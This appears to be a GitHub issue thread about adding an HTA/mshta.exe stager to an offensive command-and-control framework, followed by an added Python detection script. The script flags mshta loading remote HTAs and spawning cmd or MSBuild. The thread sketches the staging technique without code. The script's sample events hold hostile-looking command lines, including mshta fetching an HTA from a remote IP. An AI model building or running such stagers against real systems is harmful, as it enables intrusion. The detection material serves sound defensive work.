HTA stager

Open RealHarshThakur opened this issue 5 years ago • 8 comments

Hey, is it possible to add mshta-based exploits? Generating HTML applications and running them with mshta shouldn't be a problem, I guess.

RealHarshThakur, Jan 06 '19 15:01

What do you mean: a payload that calls back to mshta.exe, or a stager that uses mshta.exe to get the agent onto the system?

RayofLightz, Jan 06 '19 22:01

Stager to get the agent.

RealHarshThakur, Jan 08 '19 14:01

So in one of the scripts you can use ActiveXObject to call cmd and call code. It is not the cleanest solution, but maybe you could grab and execute an msbuild stager using an HTA.

RayofLightz, Jan 09 '19 02:01

Can you specify which script you're talking about?

RealHarshThakur, Jan 13 '19 05:01

Using ActiveXObject, do you mean by creating a wscript.shell object? Won't that require the site to be in Trusted Sites?

RealHarshThakur, Jan 13 '19 05:01

You are talking about an HTA, correct? HTAs are HTML applications. They live on local disk and are run inside of a stripped-down IE window. The code that gets run is using ActiveXObject. The scripting languages can be either Visual Basic or JavaScript. The issue is that ActiveXObject is limited to COM objects. Using wscript.shell is the only way I can think of to create a stager, even though it would basically fall back onto another staging method. Unless there is a COM object that can be used to compile C#?

RayofLightz, Jan 14 '19 02:01

I think this could be done: when the malicious executable runs, it could get the shell and run "mshta 'url of the hta'".

RealHarshThakur, Jan 14 '19 23:01

This is already on my to-do list :)

byt3bl33d3r, Feb 09 '19 17:02
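
Seen from the detection side, the two behaviours discussed in this thread (mshta.exe started with a URL to an HTA, and an HTA using wscript.shell to launch cmd or msbuild) both show up in process-creation telemetry. The following is an added example, not part of the thread or of the SILENTTRINITY project; the field names follow Sysmon Event ID 1, and the events, rule names and child-process list are constructed assumptions.

```python
import ntpath
import re

# Constructed process-creation records (Sysmon Event ID 1 style); not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://203.0.113.10/update.hta",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami",
     "ParentImage": r"C:\Windows\System32\mshta.exe"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": r"MSBuild.exe C:\Users\Public\build.xml",
     "ParentImage": r"C:\Windows\SysWOW64\mshta.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",  # local HTA opened by the user
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\help.hta"',
     "ParentImage": r"C:\Windows\explorer.exe"},
]

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
# Children named in the thread (cmd, msbuild); extend for your environment.
SUSPICIOUS_CHILDREN = {"cmd.exe", "msbuild.exe"}


def _name(path):
    """Lower-cased executable name from a Windows path, on any host OS."""
    return ntpath.basename(path or "").lower()


def classify(event):
    """Return the names of the rules a process-creation event matches."""
    hits = []
    image, parent = _name(event.get("Image")), _name(event.get("ParentImage"))
    # Rule 1: mshta.exe asked to load an HTA from a remote URL.
    if image == "mshta.exe" and REMOTE_URL.search(event.get("CommandLine", "")):
        hits.append("mshta_remote_hta")
    # Rule 2: an HTA (running inside mshta.exe) started a command interpreter or build tool.
    if parent == "mshta.exe" and image in SUSPICIOUS_CHILDREN:
        hits.append("mshta_spawned_child")
    return hits


def scan(events):
    """Return (index, rules) for every event that matches at least one rule."""
    return [(i, rules) for i, e in enumerate(events) if (rules := classify(e))]


if __name__ == "__main__":
    for index, rules in scan(SAMPLE_EVENTS):
        print(index, rules, SAMPLE_EVENTS[index]["CommandLine"])
```

The fourth sample event, a locally installed HTA opened from explorer.exe, matches neither rule, which is the baseline to tune against before alerting.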